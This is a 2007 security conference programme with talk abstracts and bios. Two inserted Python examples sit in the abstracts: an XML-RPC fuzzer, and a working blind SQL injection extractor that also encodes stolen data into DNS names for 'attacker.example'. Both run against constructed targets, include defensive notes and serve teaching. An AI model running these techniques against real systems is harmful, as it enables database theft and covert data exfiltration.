Schedule for 2007

Thursday Oct 11, 2007
08:30 Registration and Morning Coffee
09:00 Opening Words, Tomi Tuominen
09:15 Keynote: eSStonia
Hillar Aarelaid
CERT-EE
10:15 Coffee
10:30 Keynote: eSStonia
Hillar Aarelaid
CERT-EE
11:30 Lunch
12:30 w3af - A framework to own the Web
Andres Riancho
Cybsec
Mobile phone spying tools and how to protect against them
Jarno Niemelä
F-Secure Oyj
13:30 Break
13:45 w3af - A framework to own the Web
Andres Riancho
Cybsec
An introduction to legacy mobile data networks
olleB
Toolcrypt Group
14:45 Coffee
15:00 Windows Vista - 12 steps to better information security
Kimmo Rousku
An introduction to legacy mobile data networks
olleB
Toolcrypt Group
16:00 Closing Words for the 1st day, Tomi Tuominen
16:15 Cocktails & Networking
19:00 Cocktails & Networking ends

Friday Oct 12, 2007
08:30 Morning Coffee
09:00 Opening Words, Tomi Tuominen
09:15 Hacking the web 2.0
Thomas Olofsson
SELinux; an Introduction to MAC and DTe
Robert E. Lee
Outpost24
10:15 Coffee
10:30 Hacking the web 2.0
Thomas Olofsson
SELinux; an Introduction to MAC and DTe
Robert E. Lee
Outpost24
11:30 Lunch
12:30 School of hard knocks - things you can learn and the laughs you can have when working with MSRC
Mark Debenham
Microsoft UK
Solving the T2'07 Challenge
Kamil Leoniak
F-Secure Oyj
13:30 Break
13:45 SQL-injection and Out-of-Band channeling
Patrik Karlsson
Cqure.net
Anti-debug methods and how to bypass them
Toni Koivunen
CERT-FI
14:45 Coffee
15:00 SQL-injection and Out-of-Band channeling
Patrik Karlsson
Cqure.net
CVSS and CVE-resolver concept
Juhani Eronen, Sauli Pahlman
CERT-FI
16:00 Closing Words, Tomi Tuominen
16:00 Conference Ends

Keynote: eSStonia

Hillar Aarelaid @ CERT-EE


During April and May of this year, massive online attacks were launched against Estonia. Although Estonia was able to respond to these incidents and prevent critical damage, the attacks represent an escalation in the use of the Internet in warfare.

In these attacks the critical infrastructure proved to be the private and business sector, rather than what is usually considered the top risk (such as transportation and energy systems). ISPs, banks and media web sites became critical and had to be protected.

This talk will summarize and analyze the attacks and the defense during the incident of April-May this year, and also go into some of the details of those events.

Hillar Aarelaid is the manager of CERT-EE. He has also served as Chief Information Security Officer in Estonian Police and as a Director General in Data Protection Inspectorate.


w3af - A framework to own the Web

Andres Riancho @ Cybsec


Web application auditing and exploitation is an art, but even art needs the help of tools to make the process faster and more accurate. Right now open source tools like nikto, wapiti, pantera and others try to find vulnerabilities in web applications but lack many features and configuration options. Commercial tools have the features, at the expense of high product costs, and aren't as dynamic as open source projects.

w3af ( Web Application Attack and Audit Framework ) is an open source project that aims to automate the detection and exploitation of all web application vulnerabilities. The project objective is to become an open platform where anyone can contribute code and new techniques. w3af is extended using plugins that are fully written in Python; right now the project has more than 85 plugins and 35K lines of code!

The framework is divided into three phases: discovery, audit and attack. All plugins smoothly communicate with each other and _work together_ to achieve the objective; w3af replaces standalone tools and makes web penetration testing as easy as possible; any unusual feature can be added as a plugin and use all the features of the framework.

w3af implements many exploit plugins and features to aid this process; no less important are the discovery and audit plugins that will find those vulnerabilities for you to exploit! w3af, one tool to rule them all.

The outline of the presentation will be following:

* The current state of web application tools
* w3af architecture overview
* Extending the functionality with plugins
* w3afAgent
* Web 2.0
* Lots of demos
* Conclusions

Andres Riancho has been working as a security consultant for Cybsec for the last two years, focused on Penetration Testing and Vulnerability Research. During his research he has found critical vulnerabilities in 3com TippingPoint and ISS appliances and has also contributed to the SAP vulnerability research done at Cybsec. His main focus is web application auditing and exploitation, which is why he developed w3af, the web application attack and audit framework: a very complete framework for auditing and exploiting web applications.


Windows Vista - 12 steps to better information security

Kimmo Rousku


The presentation walks through the key workstation-level security features of Windows Vista and gives practical tips on using AD (Active Directory) to improve security.

Kimmo Rousku has worked as a freelance IT trainer and non-fiction author since 1985. He has written hundreds of magazine articles and more than a dozen books on the IT field, the most recent of which is "Windows Vista - tehoa työskentelyyn", published by Docendo. Over the years more than 12,000 people have attended his training sessions and lectures. His full-time position is head of IT management and information security at Stakes.


Mobile phone spying tools and how to protect against them

Jarno Niemelä @ F-Secure Oyj


Mobile phone spying tools are tools used to spy on a person's private information and phone usage. They range from simple SMS forwarding tools to tools that can reveal all the private information the phone holds, be it the phone book, SMS and MMS messages, call history or current physical location.

This talk will give more information about currently available mobile spying tools and the threats they represent. The talk will cover the tools available today, what they are capable of and how to detect that a phone is being spied on.

The authors of mobile spying tools claim that such tools should be used only for legal purposes, such as monitoring your children or tracking stolen phones. However, with the capabilities such tools provide, they can just as easily be used for stalking or corporate espionage.

Jarno Niemelä joined F-Secure Corporation in 2000 as a Mobile Anti-Virus Researcher and currently serves as a Senior Anti-Virus Researcher in the same company. He has followed the mobile malware and security field for over six years and has seen the threats develop from the first Palm OS trojan to current Symbian malware.


An introduction to legacy mobile data networks

olleB @ Toolcrypt Group


The talk will present a brief history of mobile data networks and an overview of the commercial packet data networks that are in operation today. It will focus on "legacy" networks built on standards developed in the 70's and 80's and show some of the fun things you can find whizzing about these older networks, where "security" only meant "availability" and access controls were mostly an afterthought.

Two specific examples of insufficient security for protocols using a shared medium will be given, as the security mechanisms of the NMT and Mobitex protocols are revealed. Finally we will touch on the technologies that will eventually replace these older systems and present some highly unscientific estimates of how quickly they will die out.

OlleB is a surprisingly shy extrovert who, by day, works on bringing the IT-security solutions of tomorrow to the systems of today. In his spare time, what precious little there is, he engages in exploratory deconstruction of technology and alcohol-induced amnesia.


Hacking the web 2.0

Thomas Olofsson


The web is changing rapidly. New technologies are emerging. The once static posting of web forms is a thing of the past. Today modern web applications interact with users via Flash movies, self-modifying search boxes and forms that are generated on the fly by client-side JavaScript.

This presentation covers the basics of modern web 2.0 frameworks, including GWT. The focus is on the potential security problems within these types of applications, but it also shows how to penetration test and audit them. So how do you test a web application that doesn't contain a single line of HTML?

A few tools and techniques are shown for successfully testing these Ajax-based applications.

The outline of the presentation will be following:

* Enumerating web services
* Enumerating ajax applications
* Hacking XMLRPC
* Fuzzing xmlhttp requests
* Fuzzing client side javascripts
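The first three outline items share one workflow: ask the endpoint what it exposes, then feed each method input it was not written for and watch what the faults give away. The following is an added example, not the speaker's code, and it runs against a constructed in-process XML-RPC service (the `get_balance` and `transfer` methods and their data are invented) using Python's own `xmlrpc` dispatcher instead of an HTTP client, so it runs offline; the same requests would go over HTTP POST against a real endpoint.

```python
"""Enumerate and fuzz an XML-RPC endpoint.  Constructed example: the target
service and its methods are invented, and requests are dispatched in-process
rather than sent over HTTP."""
from xmlrpc.client import Fault, dumps, loads
from xmlrpc.server import SimpleXMLRPCDispatcher


# --- Constructed target: the kind of backend an Ajax front end talks to ---
def get_balance(account_id):
    """Invented method: returns the balance for an integer account id."""
    balances = {1: 120, 2: 50}
    return balances[account_id]        # KeyError on unknown ids or wrong types


def transfer(src, dst, amount):
    if amount <= 0:
        raise ValueError("amount must be positive")
    return {"from": src, "to": dst, "amount": amount}


service = SimpleXMLRPCDispatcher(allow_none=True)
service.register_introspection_functions()   # exposes system.listMethods etc.
service.register_function(get_balance)
service.register_function(transfer)


def call(method, *params):
    """Marshal a methodCall, dispatch it, unmarshal the methodResponse.
    Raises xmlrpc.client.Fault when the server answers with a fault."""
    request = dumps(params, methodname=method, allow_none=True)
    # Stand-in for an HTTP POST: hand the XML body straight to the dispatcher.
    response = service._marshaled_dispatch(request.encode())
    return loads(response)[0][0]


def enumerate_methods():
    """Step one of the audit: introspection gives the method names and their
    docstrings, which often describe parameters better than the front end."""
    return {name: call("system.methodHelp", name)
            for name in call("system.listMethods")}


# Constructed fuzz cases: expected use, then unknown ids, type confusion,
# null, oversized input, out-of-range and missing parameters.
FUZZ_CASES = [
    ("get_balance", (1,)),
    ("get_balance", (999,)),
    ("get_balance", ("1",)),
    ("get_balance", (None,)),
    ("get_balance", ("A" * 4096,)),
    ("transfer", (1, 2, -5)),
    ("transfer", (1, 2)),
]


def fuzz():
    """Returns (method, params, ("ok", result) | ("fault", faultString)).
    The fault strings are the finding: the stock dispatcher echoes the Python
    exception type and value, which tells the attacker how the method is
    implemented and which inputs reach unhandled code paths."""
    results = []
    for method, params in FUZZ_CASES:
        try:
            outcome = ("ok", call(method, *params))
        except Fault as fault:
            outcome = ("fault", fault.faultString)
        results.append((method, params, outcome))
    return results


if __name__ == "__main__":
    for name, doc in enumerate_methods().items():
        print(f"{name}: {doc!r}")
    for method, params, outcome in fuzz():
        shown = tuple(p[:10] + "..." if isinstance(p, str) and len(p) > 10 else p
                      for p in params)
        print(method, shown, "->", outcome[0], str(outcome[1])[:60])
```

Against a real service, replace `call` with an HTTP POST of the same body to the endpoint URL and keep the rest; a fault string that names an internal exception class, or a success on a negative amount, is the point at which manual testing takes over.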

Thomas Olofsson is a security professional who has been working with IT-security and penetration testing since 1997. He has focused on application security and has tested the application security of many large corporations and banks over the years. Thomas also has a lot of experience in application development.


School of hard knocks - things you can learn and the laughs you can have when working with MSRC

Mark Debenham @ Microsoft UK


Just what really goes on in the little portion of Microsoft that deals with reported security vulnerabilities? What kinds of things are encountered, and how are lessons learnt when bugs are found? This talk will discuss bugs that have been found and fixed in both Windows and other Microsoft products and services, as well as the lessons that have been learnt.

Mark Debenham, Security Software Engineer at Microsoft, works with a team of security researchers who investigate vulnerabilities and security threats as part of the Microsoft Security Response Center (MSRC).

The SWI React team works on every MSRC case to help improve the guidance and protection provided to customers through security updates and bulletins, by discovering additional attack vectors and new exploitation techniques and by adapting methods and techniques quickly to stay ahead of the ever-evolving security ecosystem.

The team also provides forward looking security guidance to product teams within Microsoft, impacting products and services before and after release.


SQL-injection and Out-of-Band channeling

Patrik Karlsson @ Cqure.net


Did you know a hacker could steal your corporate secrets by channeling them over DNS?

A large number of web applications are still found to suffer from improper input validation. This is commonly exploited by hackers to gain unauthorized access to backend databases and to steal sensitive corporate information. As systems are hardened, hackers are often forced to rely on blind SQL injection to extract information.

The audience will be introduced to the traditional methods of extracting information using SQL injection. Demonstrations will show how an attacker has to adapt his methods once applications and systems are hardened. The talk will cover:

* extracting information through application error messages
* extracting information by reshaping queries
* extracting information by blind SQL-injection

The presentation will then introduce the concept of out-of-band channeling which is an alternative technique that under certain circumstances may be much more efficient. A number of different out-of-band channels with their respective pros & cons will be presented. The focus will be on extracting information using DNS as the out-of-band channel. At the end a number of preventive measures will be discussed.
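The two techniques the abstract contrasts, bit-by-bit blind extraction and shipping the value out through an out-of-band channel, are shown together below as an added example; it is not code from the talk. The vulnerable lookup, the `users` table and its secrets, and the `attacker.example` domain are all constructed, and SQLite in memory stands in for the backend so it runs offline. The DNS part shows only the encoding an attacker would push into query names, the decoding on the receiving side and a resolver-side heuristic for spotting it; the actual trigger (getting the database server to resolve an attacker-controlled name) is database-specific and left to the talk.

```python
"""Blind SQL injection against a deliberately vulnerable query, and the DNS
out-of-band channel idea.  Constructed example: the users table, its contents
and the attacker.example domain are invented."""
import re
import sqlite3

# Constructed backend standing in for the corporate database.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);
    INSERT INTO users VALUES (1, 'alice', 'Tr0ub4dor');
    INSERT INTO users VALUES (2, 'bob', 'hunter2');
""")
query_count = 0


def lookup_vulnerable(name):
    """Deliberately vulnerable: user input is concatenated into the SQL."""
    global query_count
    query_count += 1
    sql = "SELECT id FROM users WHERE name = '" + name + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_safe(name):
    """Hardened: a bound parameter is data and is never parsed as SQL."""
    return [row[0] for row in conn.execute(
        "SELECT id FROM users WHERE name = ?", (name,))]


def oracle(condition):
    """All a blind attacker sees: did the page show a result or not.
    The payload comments out the closing quote of the original query."""
    try:
        return len(lookup_vulnerable(f"alice' AND ({condition}) -- ")) > 0
    except sqlite3.Error:
        return False


def blind_extract(target_sql, max_len=64):
    """Boolean-based blind extraction of the scalar returned by target_sql.
    Each oracle call leaks one bit; returns (value, number of queries)."""
    global query_count
    query_count = 0
    length = next((n for n in range(max_len + 1)
                   if oracle(f"length(({target_sql})) = {n}")), None)
    if length is None:
        raise ValueError("value longer than max_len or query failed")
    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127                       # binary search over ASCII
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({target_sql}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars), query_count


# --- Out-of-band channel: carry the value in DNS query names instead ---

def exfil_names(data, domain):
    """Hex-encode bytes and split into DNS labels of at most 60 hex chars
    (the label limit is 63), with a sequence number label per name."""
    hexdata = data.hex()
    chunks = [hexdata[i:i + 60] for i in range(0, len(hexdata), 60)]
    return [f"{seq}.{chunk}.{domain}" for seq, chunk in enumerate(chunks)]


def decode_exfil(names):
    """Reassemble the bytes from the names the attacker's DNS server logged."""
    parts = {}
    for name in names:
        seq, chunk = name.split(".")[:2]
        parts[int(seq)] = chunk
    return bytes.fromhex("".join(parts[k] for k in sorted(parts)))


HEX_LABEL = re.compile(r"^[0-9a-f]{12,63}$")


def looks_like_exfil(qname):
    """Resolver-side heuristic (one preventive measure): flag a name with a
    long all-hex label.  The length threshold is a tuning assumption."""
    return any(HEX_LABEL.match(label) for label in qname.lower().split("."))


if __name__ == "__main__":
    secret, queries = blind_extract("SELECT secret FROM users WHERE name = 'bob'")
    print(f"blind: extracted {secret!r} with {queries} boolean queries")
    for name in exfil_names(secret.encode(), "attacker.example"):
        print("oob:", name, "(flagged)" if looks_like_exfil(name) else "")
```

The query count is the argument for the out-of-band channel: seven boolean queries per character, plus the length probe, against one DNS name that carries the whole secret. On the defensive side the parameterized `lookup_safe` closes the injection, and egress filtering of DNS from database hosts (or a resolver that logs and flags names like those above) closes the channel.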

Patrik Karlsson is the founder of the security related website cqure.net, where he publishes some of his security related work. He has published security advisories outlining vulnerabilities in products from vendors such as Citrix, Novell and IBM, and frequently releases security related tools used by security professionals all over the globe. His work has been mentioned in a number of articles and books and used for education and security testing. For the last couple of years he has specialised in web application security and databases. He is currently a partner at Inspect it, a Sweden-based information security consultancy.


SELinux; an Introduction to MAC and DTe

Robert E. Lee @ Outpost24


To quote a now (in)famous security researcher "0-day can happen to anyone". While to a certain degree this may be true, SELinux with a well thought out policy can greatly limit the impact of an attack.

This talk will contrast high level differences between Discretionary and Mandatory Access Control. It will also introduce the concepts of Domain and Type Enforcement (specifically SELinux's TE implementation). It will conclude with a demonstration of Type Enforcement protecting a system from an application/user-land attack.

Robert E. Lee is the Chief Security Officer for Outpost24, a Vulnerability Management service provider. Robert came to Outpost24 after they acquired Dyad Security. As the founder of Dyad Security, Robert performed manual security tests, taught ISECOM's OPST and OPSA certification courses, and contributed ideas to security tool projects such as Unicornscan. Robert also serves on the Board for ISECOM and has contributed to the OSSTMM. Robert has been working with UNIX, networks, and security since 1992.


Solving the T2'07 Challenge

Kamil Leoniak @ F-Secure Oyj


The presentation will go through the T2'07 Challenge and explain its inner workings. The outline of the presentation will be following:

* General overview
* Architecture overview
* Anti-debugging techniques
* Pseudo-C language, challenge source
* One way of solving the challenge

Kamil Leoniak joined F-Secure Corporation in year 2006 as Anti-Virus Researcher. He is mainly interested in reverse engineering packers and complex protection schemes.


Anti-debug methods and how to bypass them

Toni Koivunen @ CERT-FI


An increasing number of malicious programs use various methods to detect debuggers and monitoring programs, as well as anti-analysis methods that make the malware analyst's task harder. This presentation will go through some of these methods, describing what they do and how to bypass them.

Participants will also be given a small program that might help detect some of these methods.

Toni Koivunen is an Information Security Analyst at CERT-FI, where his responsibilities include malware analysis and exploitation methods. Off-duty he also manages the teamfurry.com domain which focuses on various malware and reverse engineering issues.


CVSS and CVE-resolver concept

Juhani Eronen, Sauli Pahlman @ CERT-FI


Currently, many information security related problems are tracked in a very manual and time-consuming manner. There are several automation projects at CERT-FI aimed at decreasing manual labor, which in turn frees resources and raises staff motivation. The CVE-Resolver is a tool, and an underlying concept, for automated vulnerability tracking.

The resolver gathers data in (semi-)formally defined formats from various repositories. The presentation includes a concise introduction to CVSS and other common vulnerability taxonomies and metrics. Basic information on each vulnerability, such as the release date, vulnerable systems, external references and related vulnerabilities, is recorded.

The gathered information works as an up-to-date vulnerability encyclopedia as well as a basis for statistics and visualisation. The data is periodically updated, and change notifications are sent on tracked issues. The data is saved to a wiki in a format that enables automated processing while facilitating expert analysis and collaboration.

Juhani Eronen is an Information Security Analyst at CERT-FI, where his responsibilities include vulnerability co-ordination, automation of the handling of security incidents and information assurance. Formerly, he worked for OUSPG researching protocol vulnerabilities and dependencies of the critical information infrastructure, among other things.

Sauli Pahlman is an Information Security Analyst at CERT-FI, where his responsibilities include incident response, security automation and system administration. Formerly, he worked for TeliaSonera R&D researching mobile communication techniques and services. He holds an M. Sc. in Electrical Engineering from the Helsinki University of Technology.